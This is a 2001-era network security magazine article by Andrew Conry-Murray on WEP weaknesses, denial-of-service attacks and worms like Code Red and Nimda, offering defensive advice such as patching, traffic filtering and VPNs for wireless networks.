|
DoS
attacks, worms, and wireless vulnerabilities constantly hover
at the edges of networks. In this article, Andrew Conry-Murray
explores the origin of these attacks, discusses the reasons
they are so prevalent, and highlights steps administrators
can take to avoid getting stung
One
night last summer, a mosquito awakened me. I couldn’t
see it in the dark, but its dentist-drill whine was unmistakable.
As it passed my right ear I slapped wildly, hoping for a kill.
Then I waited a minute. Silence. I relaxed. Suddenly the buzzing
began at my left ear. Again I flailed at myself. Again a quiet
interlude, then another attack.
Finally I turned on the light. The mosquito hovered in a high
corner of my bedroom, bobbing like a prizefighter. I grabbed
a t-shirt and lashed out. The mosquito’s evening ended
with a satisfying thwack and a telltale smear on the wall.
I settled back in bed, pleased that I’d taken action.
Had I just lain there, the bug would’ve come at me all
night until it got what it wanted: my blood.
Bloodsuckers swarm the Internet too, and three in particular
bite networkers again and again: wireless vulnerabilities,
Denial of Service (DoS) attacks, and worms. These threats
persist for several reasons, including an abundance of automated
attack tools, egregious technology failures, and sometimes
sloppy security administration.
Wireless woes
Wireless LANs based on the 802.11b standard (2.4GHz operation
with speeds of 11Mbits/sec) have been making inroads to corporate
networks for three reasons: they’re cheaper to install
than cabling, they’re easy to set up, and they let workers
stay connected to the network as they roam from office to
conference room and even outdoors. According to a Gartner
survey, 50 percent of respondents will have a wireless access
point touching their corporate networks by the end of 2001.
However, thanks to a poor security implementation, a wireless
network allows attackers to waltz right into a corporate network.
Wireless’ primary vulnerability it’s a radio transmitter
broadcasting traffic hundreds of feet in every direction is
well known. Stories abound of security researchers armed with
wireless-enabled laptops intercepting corporate traffic as
they sit in a company’s parking lot or lobby.
Wired Equivalent Privacy (WEP), part of the IEEE’s 802.11
standard, was supposed to neutralise wireless’ gregariousness
by adding encryption and access control. But recent developments
demonstrate that WEP is about as strong as a wet paper bag.
“WEP
is insecure in just about every way you could be afraid of,”
says Dave Wagner, cryptography expert and assistant professor
of computer science at the University of California, Berkeley.
He and colleagues, Nikita Borisov and Ian Goldberg, were one
of several groups that discovered exploitable holes in both
the 40-bit and 128-bit versions of WEP. “You can eavesdrop
on
WEP sessions, you can tamper with transmitted packets, you
can bypass the access control to gain access to the network,”
he says.
The most troubling attack was posited in a paper by researchers
Fluhrer, Mantin, and Shamir, who suggested a way to recover
the shared secret key that WEP uses to encrypt traffic between
the access point and a client. The paper was merely theoretical
until three AT&T Labs re- searchers tried the attack.
The problem lies in the way WEP handles RC4, the underlying
cryptographic algorithm. “They started with a good encryption
algorithm and misapplied it,” says Wagner.
As is usually the case, this high-level research has condensed
itself into easily-used attack tools such as AirSnort and
WEPCrack, which let even low-skilled attackers decipher WEP-encrypted
data.
Using AirSnort, “an attacker can break the cryptography
by listening to about 15 minutes of network transmissions,”
says Wagner. “Someone sitting in a van in your parking
lot could use the attack to eavesdrop on your traffic. Once
this attack is finished, the bad guy learns your encryption
keys.”
Besides deciphering data, possession of the key gives an attacker
access to the wireless network, which may expose systems on
the wired network, such as workstations, production servers,
databases, and other rich pickings.
But before you start yanking NICs out of laptops, experts
say that wireless LANs can be safe, as long as you don’t
rely on WEP. According to John Pescatore, research director
for Internet security at the Gartner Group, major vendors
of wireless products such as Cisco Systems and Agere Orinco
have added their own security measures. One measure is
dynamic key management, in which the access point frequently
changes the encryption key.
However, until the IEEE releases an updated standard, don’t
expect the security features in products from different vendors
to interoperate. Pescatore says that a new draft standard
may appear in the first quarter of 2002, with compatible products
on the market by the end of 2002.
What if you don’t want to be locked in to a single vendor
but you also can’t wait until 2003? There are other options,
but they’ll cost you. You can purchase security solutions
from smaller companies such as Colubris, Bluesocket, Proxim,
and Funk Software, to add to your present wireless infrastructure.
These solutions layer strong authentication and encryption
over your wireless traffic.
Alternatively, you can treat your wireless network the same
way you would the Internet. Ensure that wireless traffic entering
your corporate network has to pass through a firewall first.
Also, “wherever you have a wireless access point, put
a VPN server behind it,” says Pescatore. “When I
connect to the access point, I’m behind this VPN server
that I have to authenticate to, just the way I would over
the Internet.” An IPSec-compatible VPN provides much
stronger authentication and encryption than WEP. However,
it also requires installing additional VPN gateways and clients,
as well as assuming the subsequent administrative costs.
Even if you tighten wireless security or your company won’t
install
a wireless LAN, don’t think you’ve dodged this bullet.
“Wireless base stations are becoming so cheap, employees
can go buy a hundred-dollar access point and plug it in to
the corporate network without telling anyone,” says Wagner.
These ‘rogue’ access points blow a huge hole in
your carefully constructed defences. Besides operating without
administrative controls, the default configurations for most
access points don’t even have WEP turned on. Pescatore
recommends that administrators regularly sweep their buildings
for unauthorised base stations. Hacker tools or commercial
products such as Network Associates’ Sniffer Wireless
can hunt down these rogue elements.
Denial ain’t a river in
Egypt
DoS and Distributed DoS (DDoS) attacks are well understood.
The perpetrator bombards a target with more traffic than it
can handle. The bad traffic prevents legitimate users from
accessing the resources under attack. DoS and DDoS work either
by swamping the CPU on a target machine with connection requests,
or by soaking up network bandwidth with spurious traffic.
A single computer can launch a DoS attack, but most attacks
use numerous machines, either in a co-ordinated effort by
multiple users or by commandeering unwitting computers (often
called zombie hosts).
So if DoS attacks are well understood, why are they still
a problem? One reason is that the attacks themselves use legitimate
network protocols such as TCP and UDP to carry out their mischief.
Networks “have to let certain types of traffic through,
so that’s the type [attackers] send,” says Stefan
Savage, chief scientist at DoS prevention company Asta Networks,
and assistant professor of computer science at University
of California, San Diego.
Attackers “will send floods of TCP data that just has
the ACK flag set. That will pass through almost every firewall
around,” notes Savage. “It’s hard to disambiguate
what is legitimate data and what isn’t.”
Other popular attacks use Internet Control Message Protocol
(ICMP) messages, such as ICMP Time Exceeded and ICMP Echo
Reply, to overwhelm computational resources. Savage says that
these are valid control messages that must be allowed in a
network to use common tools like Traceroute and Ping.
Another reason for DoS’s persistence is that many automated
tools (such as Trinoo and Tribe Flood Network) make launching
attacks child’s play. Lastly, attackers have access to
considerable firepower, whether from a single PC with a broadband
connection or a score of conscripted hosts, known as zombie
hosts.
Joe Magee, chief security officer for TopLayer Networks, which
makes load balancing and security devices, says a home broadband
connection can easily pump out enough traffic to take down
a server. “We set up an IIS 5 Web server with no SYN
flood defences,” he says. On a Pentium 400 platform,
the test machine handled between 100 and 120 SYN packets per
second. “A 128Kbit upload connection, which is typical
in most home DSL or cable modems, is capable of sending out
200 to 800 SYNs per second.” That’s enough packet
power to knock out eight Web servers from one PC.
Of course, many attackers aren’t content to use a single
machine. Myriad holes and vulnerabilities in operating systems
allow attackers to break into machines and install remote
control programs. The result is an army of devices ready to
launch packets when and where the attacker instructs. The
automation of the whole process compounds this problem. “There’s
this notion that hackers are sitting around trying to break
into all these machines,” says Savage. “The reality
is different. They have scripts that scan millions of addresses
on the Internet. They have a library of vulnerabilities they
test all these machines for. Then you just go to sleep, and
you wake up and you have 10,000 hosts.”
So just how bad is the problem? Savage, along with two colleagues
at the University of California, San Diego, studied DoS attacks
and determined the following: Over a three-week period in
February, 2001, they observed more than 12,000 attacks on
over 5,000 distinct hosts. Victims ranged from well-known
commercial sites such as Amazon.com and AOL to ISPs, foreign
sites, and home computers.
DoS attacks put enterprises in double jeopardy. They may be
susceptible to service outages, or enterprise machines may
be hijacked and used to launch attacks on other targets. Even
if you think your business doesn’t have anything to tempt
an intruder, any computers connected to the Internet represent
resources that a miscreant may want to utilise.
In addition to business losses due to service outages, DoS
causes collateral damage. “The most important item that
we hear from customers is the protection of the brand,”
says Rich Helgeson, CEO and president of Captus Networks,
a DoS mitigation company. “They’ve spent a number
of years developing the brand, getting a trusted environment
with customers, and therefore they cannot afford anything
that compromises the brand.”
What’s a networker to do? First and foremost is apply
patches. This probably isn’t the first time you’ve
heard this, and it certainly won’t be the last, because
applying patches and hot fixes to your operating systems and
applications is the surest way to protect your network.
Aside from patching, ingress and egress filtering can curb
some DoS attacks. Many DoS tools spoof the source address
of packets to hide the location of the computer launching
the attack. Using ingress and egress filtering, routers can
be configured to drop packets with spoofed addresses so that
the nefarious traffic never reaches its target.
Service providers perform ingress filtering. According to
RFC 2827, “Network Ingress Filtering,” ISPs that
aggregate routing announcements for numerous downstream networks
can block any traffic that has a source address outside legitimately
advertised prefixes. ISPs aren’t mandated to perform
ingress filtering, and in fact the provider’s size might
make it impossible. However, it can’t hurt to check with
your prov-ider to see what it can do for you.
Egress filtering takes place at enterprise border routers.
A router configured for egress filtering will drop packets
with a source address not legally assigned to your network.
This is one way to prevent yourself from being an unwitting
participant in a DoS attack. If an attacker has planted zombie
hosts inside your network, egress filtering may prevent those
packets from getting out your front door.
Of course, ingress and egress filtering won’t help against
packets with legitimate source addresses, but at least you’ll
be able to track down the offending machine.
Firewalls and Intrusion Detection Systems (IDSs) generally
include a smattering of DoS prevention capabilities against
common attacks such as SYN floods. However, a crop of new
specialised devices promise full-blown protection. Vendors
such as Captus Networks, Asta Networks, Arbor Networks, Top
Layer Networks, and others are selling in-line hardware devices
that scan incoming traffic for anomalous behaviour. Traffic
that fits DoS profiles can be filtered, blocked, re-routed,
or rate-limited. Several vendors claim that their devices
can respond to DoS attacks within 60 seconds.
It’s difficult to predict how the marketplace will greet
this specialised anti-DoS gear. Administrators may be wary
of installing yet another security box in the data stream
with all its attendant costs: learning to operate the product,
dealing with yet another management interface, and responding
to more alerts. It’s also possible that if you wait long
enough, the algorithms that power these DoS solutions may
find their way into a multipurpose security device.
On the other hand, such devices have several compelling claims.
First, they can tell you if something’s actually wrong.
Are you actually under attack or just experiencing a spike
in legitimate traffic? Second, these products can provide
concise information about an attack, which allows for granular
responses so that normal traffic still gets through. Finally,
having automated responses prepared in advance can save precious
time, especially in the first frantic minutes of a raging
packet flood.
Worms crawl in, worms crawl out In
2001, worms began to displace
viruses in the media spotlight. How does a worm differ from
a virus? “The way I think of a virus is something that
replicates by infecting multiple files on the one host, whereas
worms tend to just infect hosts once, and then they use network
calls to move on and infect the next host,” says Roger
Thompson, technical director of malicious code research for
TruSecure. Typically, worms spread via e-mail or by searching
ma-chines with known vulnerabilities that the worm exploits
to burrow into a machine.
Worms usually don’t require any human interaction to
spread. “Case in point is the Code Red worm,” says
Sharon Ruckman, senior director at Symantec Security Response.
“If your machine had the vulnerability that it was looking
for, you could be home asleep, and once you had been infected,
it was going off trying to infect other people and you had
no idea.”
Ruckman says that this automation is one reason worms are
becoming more prevalent. “If you look at AnnaKornikova
or LoveLetter, you had to open it up and click on the attachment
for it to attack. With the worm technology, once you can get
it in there, you don’t need any humans to continue the
propagation.” Ruckman also notes that worms have plagued
us since the late 1980s, but increased connectivity makes
it easier for worms to spread.
Experts say that Code Red and Nimda display more sophisticated
programming than other prominent viruses. This may mean fewer
copycat versions floating around the Internet in the coming
weeks and months. “The script viruses that were the problem
up until this year were written in Visual Basic, so it was
very easy for script kiddies to make minor changes to those
things,” says Thompson. “With Nimda and Code Red
the source code isn’t available. They’re written
in either assembler or C, something that’s a bit beyond
most people. It’ll be the authors that make the changes.”
Of course, more sophisticated programming also means more
trouble. One of the reasons Code Red and Nimda attracted so
much attention is because they were “an integrated or
blended security threat,” says Ruckman. That is, worm
writers are combining multiple attacks in a single package.
For example, besides exploiting a buffer overflow in Microsoft’s
IIS 4.0 and 5.0 servers, Code Red at- tempted a DoS attack
against the White House. Code Red II installed a Trojan Horse
on every system it infected that opened the machine to remote
control.
Nimda is a more pernicious blended threat because it attacked
systems in four different ways. Like Code Red it exploited
a hole in IIS servers, but it also spread itself via e-mail
attachments, by infecting shared drives on Windows machines,
and by planting itself in a Web page and attempting to download
itself to any computer that visited that page. Nimda could
also give an attacker administrative privileges on compromised
servers.
The bad news is that Ruckman and Thompson say that these multi-threat
worms are the wave of the future, especially as more vulnerabilities
are discovered. “When we see another good buffer overflow,
I expect we’ll see another version of Code Red,”
says Thompson. “That allows them to march into a machine
that people otherwise think it is protected.”
The good news is that administrators can stomp out these worms
simply by installing the appropriate patches. “Neither
Code Red nor Nimda would’ve got in if people had been
patched,” says Thompson. In fact, Microsoft released
fixes for the IIS vulnerabilities weeks before the worms reared
their heads. Microsoft also recently released a set of free
tools to help administrators keep abreast of patches and hotfixes,
most notably one called HFNet.
Administrators can also protect themselves by maintaining
anti-virus updates, filtering potentially dangerous attachments
such as .exe at e-mail gateways, and having a recovery plan
in place if a worm or virus should corrupt computers and data.
Bug spray
If these problems teach us anything, it’s that administrators
must be vigilant and proactive. Rather than lie in the dark
and wait to get bit, act now to swat the critters that may
be lurking at the perimeter of your network. The steps you
take today could keep a simple bug bite from escalating into
a deadly infection.
www.networkmagazine.com
|
